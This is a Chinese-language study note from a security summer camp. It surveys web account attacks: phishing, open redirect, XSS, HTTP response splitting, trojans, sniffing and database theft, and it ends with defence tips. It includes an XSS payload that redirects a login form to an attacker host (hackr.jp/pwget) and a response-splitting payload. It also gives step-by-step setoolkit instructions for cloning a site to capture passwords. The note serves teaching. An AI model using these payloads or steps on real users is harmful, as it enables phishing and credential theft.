web账号攻击的原理和部分实操——夏令营案例分享
内容:web账号攻击的原理和部分实操,分析部分案例的实现过程
- 钓鱼攻击:姜太公钓鱼,愿者上钩!一种设置陷阱等待受害者上钩的被动攻击。关键就是“陷阱”(伪装的网页)和“引诱”(怎样把用户带到陷阱里)。
(1) 分类:
① 鱼叉式网络钓鱼:
这个中文名直接在www.baidu.com上搜就能找到一堆、一堆的例子,它的英文名叫“spear phishing”,其中“spread”是“矛头”、“指向”的意思,不错这个“鱼叉式网络钓鱼攻击”和“喷雾祈祷”不同的是,它针对特定用户或用户群体,也就是说先摸清了对方的底细:平时都上哪些网站,有没有什么特殊的喜好……这需要你离开电脑桌,在现实世界中运用学到的社工知识,入侵他!
鱼叉式网络钓鱼中著名的一种叫“水坑攻击”
鱼叉式网络钓鱼旨在让用户确信来源是可信的,并且有打开邮件的需求
“水坑攻击”,黑客攻击方式之一,顾名思义,是在受害者必经之路设置了一个“水坑(陷阱)”。最常见的做法是,黑客分析攻击目标的上网活动规律,寻找攻击目标经常访问的网站的弱点,先将此网站“攻破”并植入攻击代码,一旦攻击目标访问该网站就会“中招”。
② 短信和移动端钓鱼
和电子邮件诈骗无非大同小异,不过是换了一个欺骗的媒介罢了
③ 开放重定向:是指一种对指定的任意URL做重定向跳转的功能。
http://example.com/?redirect=http://hack.jp
用户看到URL原以为是要访问example.com,不料实际上被诱导至hack.jp这个重定向目标,尤其在URL很长超出了搜索的框时,用户根本不会发现这个重定向。(网址做redirect的参数)
可信度高的Web网站如果开放重定向功能,则很有可能被攻击者选中并用来作为钓鱼攻击的跳板
④ 结合XSS实现钓鱼攻击
1) XSS(跨站脚本攻击)是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击。
2) 如http://example.jp/login?ID=yama。ID的参数是用户名yama.如果有人创建了以下这段恶意代码的URL。并隐藏植入事先准备好的欺诈邮件或Web页面中,诱使用户去点击该URL。
浏览器打开该URL,直观上并没有什么变化,但嵌入的脚本<script>……</script>却在偷偷运行了。用户输入的账号密码也会发送到攻击者的网站(http://hack.jp)。
正常情况下请求http://example.jp/login?ID=yama对应的HTML:
<div class="logo">
<img src="imglogo.gif" alt="E! 拍卖会" />
</div>
<form action="http://example.jp/login" method="post" id="login">
<div class="input_id">
ID <input type="text" name="ID" value="yama" />
</div>
被嵌入恶意脚本时的请求对应的HTML源代码:
<div class="logo">
<img src="imglogo.gif" alt="E! 拍卖会 />
</div>
<form action="http://example.jp/login" method="post" id="login">
<div class="input_id">
ID <input type="text" name="ID" value=""><script>var f=document.getElementById("login"); f.action="http://hackr.jp/pwget"; f.method="get";</script><span s=""/>
</div>
除此之外,还可以通过嵌入恶意脚本,把用户cookie发送至攻击者的Web网站上,记录在他的登录日志。这样,攻击者尽管不知道账号密码,但也一样可以登录。
⑤ 网站伪装
实例:在kali虚拟机的Linux系统上自带的软件
1) 打开终端;
2) 输入指令:setoolkit
3) 选择y 同意(第一次进入时才需要)
4) 依次选1、2、3、2
5) 输入一个接收信息的IP地址(就选它方括号里推荐的,即本虚拟机IP地址)
6) 输入一个要伪装的网站URL
7) 在浏览器上输入该IP地址,会发现网页除了URL之外其他内容都和要伪装的网站一样,并且上面的链接都是链接到真实的网站
8) 如果是钓取账号密码,在受害者第一次输入了正确信息,点击登录后,页面会跳转到真实的网页,而受害者的账号密码也同时被发送到预先指定的IP的电脑上。一般来说,为了不那么容易让人发现,攻击者还会把IP的域名给伪装了,并在受害者点击登录后,跳出“账号或密码错误”之类的信息。
9) 参考链接:
a. https://www.freebuf.com/sectool/73409.html
社会工程学工具集Social-Engineer Toolkit基础使用教程
网络安全之钓鱼网站
(上述实例具体操作视频)钓鱼网站的原理及防范
钓鱼攻击理论篇
几个伪装的网站例子
⑥ HTTP响应截断攻击:http响应截断攻击是用在HTTP首部注入的一种攻击,攻击顺序相同,但是要将两个%0D%0A%0D%0A(两个HTTP报文中的换行符)并排插入字符串后发送,利用这两个连续的换行就可以作出HTTP首部与主体分隔的空行 ,这样显示伪造的主体,达到攻击的目的,再让用户输入信息,可达到和跨站脚本攻击相同的效果:
%0D%0A%0D%0A<HTML><HEAD><TITLE>之后,想要显示的网页内容<!--(原来页面对应的首部字段和主体全部视为注释)
利用这个攻击,已触发陷阱的用户浏览浏览器会显示伪造的Web页面,再让用户输入自己的个人信息等,可达到和跨站脚本攻击同样的攻击效果。
⑦ 点击劫持(->Web攻击)
⑧ 会话劫持和固定会话攻击(->Web攻击)
- 盗号木马(->PPT35):“木马”与计算机网络中常常要用到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“木马”则完全相反,木马要达到的是“偷窃”性的远程控制,如果没有很强的隐蔽性的话,那就是“毫无价值”的。
盗号木马是指隐秘在电脑中的一种恶意程序,这是以盗号为目的并且能够伺机盗取各种需要密码的账户(游戏,应用程序等)的木马。
实操:实验吧《信息安全导论》-> PyShare木马:http://jnu.shiyanbar.com/course/6200/vid/59
黑客盗号技术:
http://www.360doc.com/content/17/0225/18/40624445_631954355.shtml
https://blog.csdn.net/qq_36760780/article/details/81670676
- 嗅探攻击(抓包)
(1) 为什么可以嗅探抓包?解析信息传送的过程。
① HTTP报文使用明文方式发送,即使是被加密过的数据,加密处理后的报文信息本身也依然可以被看到。一样有可能被攻击者嗅探到并解密。
② 按TCP/IP协议族的工作机制,通信内容在所有的通信线路上都有可能遭到窥视。
(2) HTTP + 加密(SSL)+ 证书 + 完整性保护(PGP,MD5)= HTTPS
(3) 当前全世界大约50%的网站没有使用SSL加密,通过HTTP发送的数据都是明文,没有使用任何加密,即使是在数据敏感的注册、登录页面。
无线局域网的嗅探攻击和防御:https://blog.csdn.net/w892824196/article/details/80466832
工具:wireshark (https://www.cnblogs.com/lsdb/p/9254544.html)
kali机wireshark使用教程:https://www.01hai.com/note/av135199
- 撞库(->ppt)
- 脱库:“脱库”是一种黑客术语,也经常被称作“拖裤”,是指黑客入侵有价值的网络站点,把注册用户的资料数据库全部盗走的行为。
(1) “脱库”的通常步骤为:
① 黑客对目标网站进行扫描,查找其存在的漏洞,常见漏洞包括SQL注入、文件上传漏洞等。
② 通过该漏洞在网站服务器上建立“后门(webshell)”,通过该后门获取服务器操作系统的权限。
③ 利用系统权限直接下载备份数据库,或查找数据库链接,将其导出到本地。
实验吧:信息安全预置课 -> Csrf利用管理员权限创建后台管理员权限。
防止脱库:
1、第一,分级管理密码,重要帐号(如常用邮箱、网上支付、聊天帐号等)单独设置密码。
2、第二,定期修改密码,可有效避免网站数据库泄露影响到自身帐号。
3、第三,工作邮箱不用于注册网络帐号,以免密码泄露后危及企业信息安全。
4、第四,网站数据库加密保护。
5、第五,网站漏洞检测、网站挂马实时监控、网站篡改实时监控。
向左转|向右转
扩展资料:
其他相关概念:
在取得大量的用户数据之后,黑客会通过一系列的技术手段和黑色产业链将有价值的用户数据变现,这通常也被称作“洗库”。
最后黑客将得到的数据在其它网站上进行尝试登陆,叫做”撞库“,因为很多用户喜欢使用统一的用户名密码,”撞库“也可以使黑客收获颇丰。
“撞库”是一种黑客攻击方式。黑客会收集在网络上已泄露的用户名、密码等信息,之后用技术手段前往一些网站逐个“试”着登录,最终“撞大运”地“试”出一些可以登录的用户名、密码。
参考资料来源:百度百科-撞库
浙公网安备 33010602011771号